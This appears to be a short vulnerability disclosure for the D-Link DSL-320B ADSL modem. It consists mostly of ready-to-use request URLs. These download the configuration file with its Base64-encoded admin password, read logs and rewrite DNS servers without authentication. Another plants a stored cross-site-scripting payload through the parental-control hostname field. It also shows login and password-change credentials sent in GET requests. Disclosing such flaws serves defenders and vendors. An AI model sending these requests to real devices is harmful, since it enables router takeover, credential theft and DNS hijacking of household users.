D-Link DSL-320B Authentication Bypass / Cross Site Scripting​

http://www.dlink.com/de/de/home-solutions/connect/modems-and-gateways/dsl-320b-adsl-2-ethernet-modem


PHP:
Access to the Config file without authentica tion=>full authentication bypass possible! :): (1)

192.168.178.111/config.bin

=======

=======

=>sysPassword is Base64 encoded

*Access to the logfile without authentication : (1)

192.168.178.111/status/status_log.sys

*Change the DNS Settings without authenticati on: (1)

http://192.168.178.111/advanced/adv_dns.xgi?&SET/dns/mode=0&SET/dns/mode/server/primarydns=1.1.1.1&SET/dns/mode/server/secondarydns=2.2.2.2

*Stored XSS within parental control(2):



=>Parameter:set/bwlist/entry:1/hostname



Request:

http://192.168.178.111/home/home_parent.xgi?&set/bwlist/enable=1&set/bwlist/bw_status=0&set/bwlist/entry:1/bw_flag=0&set/bwlist/entry:1/hostname=%22%3E%3Cimg%20src=%220%22%20onerror=aler t(1)%3E&set/bwlist/entry:1/weekday=6&set/bwlist/entry:1/begintime=00:00&set/bwlist/entry:1/endtime=23:59&set/bwlist/entry:1/store=1&set/bwlist/apply=1

Again you are able to place this XSS witho ut authentication. :)

*Login Credentials in HTTP GET are not a g ood idea=> useHTTP Post! (3)

http://192.168.178.111/login.xgi?user=admin&pass=admin1

*Credentials in HTTP GET via password change request are not a good idea=> useHTTP Post!: (3)

http://192.168.178.111/tools/tools_admin.xgi?&set/sys/account/user/oldpwd=admin&set/sys/account/user/password=test&CMT=1